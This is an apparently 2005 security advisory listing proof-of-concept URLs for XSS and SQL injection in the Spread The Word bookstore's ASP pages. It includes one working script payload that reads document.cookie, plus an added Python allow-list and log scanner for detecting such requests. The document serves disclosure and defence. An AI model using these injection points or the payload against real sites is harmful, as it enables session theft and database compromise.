Comersus-based bookstore has XSS and SQL injection issues; no solution currently available.
##################################################################
Spread The Word (Comersus-based bookstore): multiple script and
variable XSS and SQL injection vulnerabilities.
vendor url: http://www.stwm.com/opportunity.asp
advisory url: http://lostmon.blogspot.com/2005/05/spread-word-multiple-xss-and-sql.html
vendor notified: yes    exploit available: yes
##################################################################
Spread The Word (Comersus-based bookstore) contains a flaw that
allows a remote cross-site scripting attack. This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts. This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
##############
versions:
##############
I can't establish which versions are affected.
##############
solution:
##############
no solution was available at this time.
##############
timeline
##############
discovered: 17 oct 2004
vendor notified: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005
####################
proof of concepts:
####################
Some files have a different prefix, such as STW;
e.g. 'ShowContent.asp' is 'STWShowContent.asp' in other stores.
#####################
BrowseCategories.asp
#####################
XSS, SQL errors and path disclosure.
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible
Cat0Literal can be books, videos, gifts, bibles, or other similar
categories listed in the cart.
#############
search.asp
#############
XSS, SQL errors and path disclosure.
http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala
http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='
##################
AdvancedSearch.asp
##################
http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit
##################
ViewItem.asp
##################
XSS, SQL errors and path disclosure.
http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]
http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]
###################
STWShowContent.asp
###################
XSS, SQL errors and path disclosure.
http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]
http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]
http://[target]/store/STWShowContent.asp
###################
MySide.Asp
###################
XSS, SQL errors and path disclosure.
http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]
http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles
#################
BrowseMain.asp
#################
XSS, SQL errors and path disclosure.
http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>
################
others
################
XSS
http://[target]/store/[email protected]&RedirectURL=[XSS-CODE]
http://[target]/store/Login.asp?RedirectURL=[XSS-code]
It is also possible to inject SQL or XSS code into the 'Cat0' or 'Cat1'
variable in all files where these variables are used.
Likewise, XSS code can be injected into the 'Cat0Literal' or 'Cat1Literal'
variable in all files where these variables are used.
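As an added defensive example (not part of the advisory and not the Comersus or Spread The Word code), the allow-list below encodes the parameter types visible in the proof-of-concept URLs above and runs it over constructed IIS-style log lines to flag requests where Cat0, Cat1, ISBN or the *Literal values carry anything other than an ID or a category name. The parameter names are the page's; the type rules, the log layout and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs

# Expected shape of the parameters named in the advisory. Assumption: the
# store's real schema is unpublished; these rules mirror the sample values in
# the proof-of-concept URLs (numeric IDs, category names, empty-or-numeric prices).
INTEGER = {"cat0", "cat1", "isbn", "idrightpage", "searchtype", "curhigh",
           "searchcat1", "searchcat2", "publicationdate"}
OPTIONAL_INTEGER = {"pricemin", "pricemax"}
CATEGORY_LITERAL = {"cat0literal", "cat1literal"}
INT_RE = re.compile(r"-?\d+")
LITERAL_RE = re.compile(r"[A-Za-z][A-Za-z ]{0,39}")


def validate_query(query):
    """Return [(param, value, reason)] for values of the wrong type; [] if clean."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        key = name.lower()  # classic ASP Request.QueryString is case-insensitive
        for v in values:
            if key in INTEGER and not INT_RE.fullmatch(v):
                findings.append((name, v, "expected integer"))
            elif key in OPTIONAL_INTEGER and v and not INT_RE.fullmatch(v):
                findings.append((name, v, "expected empty or integer"))
            elif key in CATEGORY_LITERAL and not LITERAL_RE.fullmatch(v):
                findings.append((name, v, "expected category name"))
    return findings


def scan_iis_log(lines):
    """Flag /store/ requests whose query fails validate_query(). Expects W3C
    fields: date time method uri-stem uri-query status ('-' = no query)."""
    hits = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 6:  # header or malformed line
            continue
        if parts[3].lower().startswith("/store/"):
            findings = validate_query("" if parts[4] == "-" else parts[4])
            if findings:
                hits.append((parts[3], findings))
    return hits


# Constructed sample log (not real traffic); the last two requests carry the
# kind of values the advisory's proof-of-concept URLs put in CurHigh and Cat0.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2005-05-24 10:00:01 GET /store/BrowseCategories.asp Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible 200
2005-05-24 10:00:02 GET /store/Search.asp InStock=&SearchType=783&strSearch=lol&PriceMin=&PriceMax= 200
2005-05-24 10:00:03 GET /store/BrowseMain.asp Cat0=783&Cat0Literal=Gifts&CurHigh=3%22%3E%3Cscript%3E 500
2005-05-24 10:00:04 GET /store/ViewItem.asp ISBN=0789906651&Cat0=565%27 500""".splitlines()
```

The same allow-list applied inside the ASP scripts (rejecting a request on any mismatch, and HTML-encoding any value that is echoed back) is the missing fix the advisory describes; free-text fields such as strSearch cannot be allow-listed and must be encoded on output instead.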
######################### End ########################
thnx to estrella for being my light
Thnx to icaro, he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move